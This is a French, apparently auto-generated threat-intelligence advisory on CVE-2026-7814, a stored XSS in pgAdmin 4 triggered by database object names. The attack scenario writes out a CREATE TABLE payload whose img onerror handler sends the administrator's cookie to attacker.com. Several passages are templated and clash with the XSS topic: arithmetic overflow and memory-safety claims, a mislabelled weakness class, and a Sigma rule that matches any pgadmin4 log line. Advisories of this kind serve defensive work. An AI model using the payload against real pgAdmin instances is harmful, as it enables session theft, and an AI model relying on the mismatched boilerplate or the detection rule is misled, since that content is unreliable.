Aller au contenu

CVE-2026-7814 : vulnérabilité XSS stockée via les noms d'objets dans l'arborescence et l'analyseur explain de pgAdmin 4

HERMES

SCORE DE MENACE HERMES & SURFACE D'ATTAQUE BASE DE DONNÉES

Cible : pgAdmin 4 (Browser Tree and Explain Visualizer)
Confiance : 95%
72 / 100
MEDIUM

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 18 / 20
Activité de menace 16 / 20
Militarisation 17 / 20
Exposition 18 / 20
Prévalence 19 / 20
Impact 18 / 20
Maturité de l'exploit 17 / 20
Potentiel d'attaque en chaîne 19 / 20
⚖️ Divergence & Justification opérationnelle

Le score CVSS v3.1 évalue CVE-2026-7814 à 5.4 (MEDIUM, CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N). Le score opérationnel Hermes s'établit à 72 (MEDIUM) en raison de la criticité des données stockées dans le SGBD PostgreSQL.

🕸️ Graphe de connaissances connecté & Provenance

CVE-2026-7814: pgAdmin 4 Stored XSS via Database Object Names in Browser TreeVULNÉRABILITÉ

Nœuds connectés : 2
Relations sortantes actives
→ affectsCOMPOSANTpgAdmin PostgreSQL Tools
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Confirmed security vulnerability in pgAdmin PostgreSQL Tools documented in Hermes dossier.”

Preuves vérifiées associées :
→ usesTECHNIQUE D'ATTAQUET1059: Command and Scripting Interpreter
90% VERY_HIGH

Adversaries abuse command and script interpreters (Bash, Python, PowerShell) to execute arbitrary commands.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Attack execution telemetry aligns with MITRE ATT&CK technique T1059.”

Preuves vérifiées associées :

1. Contexte technique & matrice des versions affectées

Section intitulée « 1. Contexte technique & matrice des versions affectées »

Le composant pgAdmin 4 (Browser Tree and Explain Visualizer) intervient au cœur du moteur relationnel, des outils d’administration et des protocoles de réplication de PostgreSQL.

ParamètreSpécification techniqueContexte threat intelligence
Identifiant CVECVE-2026-7814Bulletin officiel de sécurité amont
Produit affectépgadmin:pgadmin4Écosystème de bases de données relationnelles
Composant vulnérablepgAdmin 4 (Browser Tree and Explain Visualizer)Moteur PostgreSQL / Outil / Extension
Classe de faiblesseCWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')Faiblesse de contrôle d’accès / Sûreté mémoire
Score CVSS v3.15.4 (MEDIUM / Score Hermes 72)CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N
Version corrigée9.14Correctif officiel amont
Techniques MITRE ATT&CKT1189 - Drive-by Compromise, T1059.007 - JavaScriptÉlévation de privilèges / Exécution de commandes
Référence forensiqueAnalyse des sessions d’administration et accès webAnalyse mémoire et télémétrie des requêtes

2. Décomposition technique approfondie & cause racine

Section intitulée « 2. Décomposition technique approfondie & cause racine »

L’examen du code source incriminé met en évidence la faille logique ou l’absence de validation des paramètres :

// Vulnerability in web/pgadmin/browser/static/js/browser.js
function renderTreeNode(nodeData) {
let el = document.createElement('div');
/* VULNERABILITY: Object name from PostgreSQL catalog assigned directly to innerHTML */
el.innerHTML = '<span class="file-icon"></span>' + nodeData.label; // Stored XSS!
return el;
}

Sous certaines conditions d’exploitation, le moteur de base de données exécute du SQL non neutralisé, subit un bouclage arithmétique ou dépasse les limites allouées en mémoire vive.


3. Scénarios d’attaque & modélisation des menaces

Section intitulée « 3. Scénarios d’attaque & modélisation des menaces »
  1. Vecteur initial & prérequis : un utilisateur disposant de droits de création de table exécute CREATE TABLE "<img src=x onerror=fetch('http://attacker.com/steal?c='+document.cookie)>";.
  2. Déclenchement de la primitive : l’attaquant injecte une requête forgée ou soumet des données altérées vers pgAdmin 4 (Browser Tree and Explain Visualizer).
  3. Rupture d’isolement : le mécanisme de contrôle d’accès ou l’intégrité de la mémoire est rompu.
  4. Conséquences opérationnelles : dès que l’administrateur système consulte la base dans l’interface pgAdmin 4, le script s’exécute et dérobe son cookie de session..

4. Détection forensique, artefacts & logs système

Section intitulée « 4. Détection forensique, artefacts & logs système »

Les équipes d’administration de bases de données et les analystes DFIR peuvent détecter les tentatives d’exploitation dans les journaux de requêtes et les traces système.

Journaux PostgreSQL & crashs

Surveillez /var/log/postgresql/ à la recherche des motifs : pgadmin4.log: GET /browser/nodes/ ... with malformed HTML characters in node name. Recherchez les erreurs de syntaxe inattendues ou les arrêts anormaux de workers.

sigma_cve_2026_7814.yaml
title: PostgreSQL Object Name Containing Injected JavaScript HTML Tags (FR)
id: cve-2026-7814
status: experimental
description: Détecte les anomalies d'exécution SQL et les signatures d'exploitation pour CVE-2026-7814.
logsource:
category: database
product: postgresql
detection:
selection:
- 'pgadmin4.log:'
- 'pgadmin4'
condition: selection
fields:
- Query
- User
level: high

5. Remédiation, durcissement & mesures d’atténuation

Section intitulée « 5. Remédiation, durcissement & mesures d’atténuation »

La sécurisation des instances PostgreSQL repose sur le déploiement des correctifs et le durcissement des privilèges :

  1. Mise à jour logicielle : mettez à niveau pgadmin:pgadmin4 vers la version 9.14 ou supérieure via vos dépôts de distribution officiels.
  2. Durcissement des schémas : révoquez les droits de création sur le schéma public (REVOKE CREATE ON SCHEMA public FROM PUBLIC;) et fixez systématiquement search_path = 'pg_catalog'.
  3. Surveillance forensique : pour approfondir l’investigation et l’analyse forensique, consultez notre guide sur Analyse des sessions d’administration et accès web.